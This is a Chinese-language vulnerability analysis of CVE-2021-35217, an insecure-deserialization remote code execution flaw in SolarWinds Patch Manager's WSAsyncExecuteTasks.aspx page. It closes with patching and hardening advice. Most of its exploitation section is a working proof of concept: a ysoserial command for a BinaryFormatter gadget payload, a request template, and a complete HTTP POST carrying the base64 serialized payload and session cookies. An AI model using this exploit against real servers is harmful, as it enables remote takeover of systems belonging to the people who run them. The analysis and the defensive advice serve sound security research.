SolarWinds Patch Manager WSAsyncExecuteTasks RCE漏洞分析(CVE-2021-35217)

漏洞概述

CVE-2021-35217是SolarWinds Patch Manager中的一个远程代码执行漏洞，存在于WSAsyncExecuteTasks.aspx页面中。该漏洞源于不安全的反序列化操作，攻击者可以通过构造特定的HTTP请求在目标服务器上执行任意代码。

漏洞分析

漏洞位置

漏洞位于：

http://[target]:8787/Orion/PM/Controls/WSAsyncExecuteTasks.aspx

漏洞触发流程

1. 初始化阶段：

   • 在OnInit()方法中，从HTTP请求中反序列化出JSONData数据
   • 将JSONData传递给ExecuteItem()方法进行处理

2. ExecuteItem()方法处理：

   • 代码行123-138：从JSONData中提取ServerControlDefinition，使用"|"和"="进行分割，存入Dictionary<String, String>类型的parameters变量
   • 代码行140：从parameters中获取Control值并加载控件（控件值可控）
   • 代码行141：检查控件对象是否为ScmResourceBaseAsync类型，如果不是则直接返回

3. 反序列化触发点：

   • 当PreLoadMethodSerial参数不为空时，会进入反序列化流程
   • 反序列化直接使用了不安全的BinaryFormatter，导致RCE漏洞

关键参数

• Control：指定要加载的控件路径（必须为ScmResourceBaseAsync类型）
• config.ParametersSerial：存放序列化payload
• config.PreLoadMethodSerial：触发反序列化的关键参数

漏洞利用

利用条件

1. 找到一个ScmResourceBaseAsync类型的控件，例如：

   ~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx
   

2. 构造包含恶意序列化数据的HTTP请求

PoC构造步骤

1. 使用ysoserial生成payload：

   ysoserial.exe -f binaryformatter -g SessionSecurityToken -c "ping localhost -t"
   

2. 对payload进行URL编码：

   Response.Write(HttpServerUtility.UrlTokenEncode(Encoding.UTF8.GetBytes("[生成的payload]")));
   

3. 构造HTTP请求：

   POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
   Host: [target]:8787
   Content-Type: application/json
   Cookie: [有效的会话cookie]
   
   [{
     "ResourceId": null,
     "Hash": null,
     "ServerMethod": null,
     "ServerControlDefinition": "Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=[恶意payload]|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd",
     "Parameters": []
   }]
   

完整PoC示例

POST /Orion/PM/Controls/WSAsyncExecuteTasks.aspx HTTP/1.1
Host: 192.168.137.130:8787
Content-Length: 3370
Content-Type: application/json
Cookie: __AntiXsrfToken=49d368c51e2b4bffbbeae1904e825850; Orion_IsSessionExp=TRUE; ASP.NET_SessionId=3iel4j1s0uuvy3n0dkpugw30; .ASPXAUTH=B57BE373D7D9F57BE66003BCBCD663097E6FD5979FA91CA0965925EF9F662DFAB27DBB05B583F996018A5F7D78F2C6A2359918791EE44E7DACF4031FAB5E393924CB249702AED0D100289B94588277792D5C27B5C4E3089926CA43FD2733491A66D224CFF83D7803E25CF52EAEC35C2723BAD30A762E1EBA62543BFB203B6E5B3CAC97CCBF32C724994B67E47320F56FC2498C105BB89DE7917FE3923401C0B86C6B1A8ACB583A763D89344AA7561E1F; XSRF-TOKEN=gHBB9ZU1MA4DQazR0Fburx9Yjf05BEMOTYPUmxGLL1s=

[{
  "ResourceId":null,
  "Hash":null,
  "ServerMethod":null,
  "ServerControlDefinition":"Control=~/Orion/PM/Controls/Update/GroupsMissingUpdateCtrl.ascx|config.ParametersSerial=AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uSWRlbnRpdHlNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAADBTeXN0ZW0uSWRlbnRpdHlNb2RlbC5Ub2tlbnMuU2Vzc2lvblNlY3VyaXR5VG9rZW4BAAAADFNlc3Npb25Ub2tlbgcCAgAAAAkDAAAADwMAAADRBQAAAkAUU2VjdXJpdHlDb250ZXh0VG9rZW5AB1ZlcnNpb26DQBlTZWN1cmVDb252ZXJzYXRpb25WZXJzaW9umShodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzAyL3NjQAJJZINACUNvbnRleHRJZINAA0tleZ8BAUANRWZmZWN0aXZlVGltZYNACkV4cGlyeVRpbWWDQBBLZXlFZmZlY3RpdmVUaW1lg0ANS2V5RXhwaXJ5VGltZYNAD0NsYWltc1ByaW5jaXBhbEAKSWRlbnRpdGllc0AISWRlbnRpdHlADkJvb3RTdHJhcFRva2VumtQEQUFFQUFBRC8vLy8vQVFBQUFBQUFBQUFNQWdBQUFGNU5hV055YjNOdlpuUXVVRzkzWlhKVGFHVnNiQzVGWkdsMGIzSXNJRlpsY25OcGIyNDlNeTR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmowek1XSm1NemcxTm1Ga016WTBaVE0xQlFFQUFBQkNUV2xqY205emIyWjBMbFpwYzNWaGJGTjBkV1JwYnk1VVpYaDBMa1p2Y20xaGRIUnBibWN1VkdWNGRFWnZjbTFoZEhScGJtZFNkVzVRY205d1pYSjBhV1Z6QVFBQUFBOUdiM0psWjNKdmRXNWtRbkoxYzJnQkFnQUFBQVlEQUFBQXZ3VThQM2h0YkNCMlpYSnphVzl1UFNJeExqQWlJR1Z1WTI5a2FXNW5QU0oxZEdZdE9DSS9QZzBLUEU5aWFtVmpkRVJoZEdGUWNtOTJhV1JsY2lCTlpYUm9iMlJPWVcxbFBTSlRkR0Z5ZENJZ1NYTkpibWwwYVdGc1RHOWhaRVZ1WVdKc1pXUTlJa1poYkhObElpQjRiV3h1Y3owaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3dmNISmxjMlZ1ZEdGMGFXOXVJaUI0Yld4dWN6cHpaRDBpWTJ4eUxXNWhiV1Z6Y0dGalpUcFRlWE4wWlcwdVJHbGhaMjV2YzNScFkzTTdZWE56WlcxaWJIazlVM2x6ZEdWdElpQjRiV3h1Y3pwNFBTSm9kSFJ3T2k4dmMyTm9aVzFoY3k1dGFXTnliM052Wm5RdVkyOXRMM2RwYm1aNEx6SXdNRFl2ZUdGdGJDSStEUW9nSUR4UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvZ0lDQWdQSE5rT2xCeWIyTmxjM00rRFFvZ0lDQWdJQ0E4YzJRNlVISnZZMlZ6Y3k1VGRHRnlkRWx1Wm04K0RRb2dJQ0FnSUNBZ0lEeHpaRHBRY205alpYTnpVM1JoY25SSmJtWnZJRUZ5WjNWdFpXNTBjejBpTDJNZ2NHbHVaeUJzYjJOaGJHaHZjM1FnTFhRaUlGTjBZVzVrWVhKa1JYSnliM0pGYm1OdlpHbHVaejBpZTNnNlRuVnNiSDBpSUZOMFlXNWtZWEprVDNWMGNIVjBSVzVqYjJScGJtYzlJbnQ0T2s1MWJHeDlJaUJWYzJWeVRtRnRaVDBpSWlCUVlYTnpkMjl5WkQwaWUzZzZUblZzYkgwaUlFUnZiV0ZwYmowaUlpQk1iMkZrVlhObGNsQnliMlpwYkdVOUlrWmhiSE5sSWlCR2FXeGxUbUZ0WlQwaVkyMWtJaUF2UGcwS0lDQWdJQ0FnUEM5elpEcFFjbTlqWlhOekxsTjBZWEowU1c1bWJ6NE5DaUFnSUNBOEwzTmtPbEJ5YjJObGMzTStEUW9nSUR3dlQySnFaV04wUkdGMFlWQnliM1pwWkdWeUxrOWlhbVZqZEVsdWMzUmhibU5sUGcwS1BDOVBZbXBsWTNSRVlYUmhVSEp2ZG1sa1pYSStDdz09AQEBAQEL|config.PreLoadMethodSerial=SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext, SolarWinds.Orion.Actions.Models;asd",
  "Parameters":[]
}]

防御建议

1. 补丁升级：及时应用SolarWinds官方发布的安全补丁
2. 输入验证：对所有输入数据进行严格验证，特别是反序列化操作前的数据
3. 安全配置：
   • 禁用不必要的功能和服务
   • 限制对WSAsyncExecuteTasks.aspx的访问
4. 替换不安全的反序列化：使用更安全的序列化方式替代BinaryFormatter
5. 网络防护：在网络边界部署防护设备，检测和拦截恶意请求

总结

CVE-2021-35217漏洞利用SolarWinds Patch Manager中不安全的反序列化操作，通过构造特定的HTTP请求实现远程代码执行。攻击者可以利用此漏洞完全控制目标系统，危害性极高。建议相关用户立即采取防护措施，防止漏洞被利用。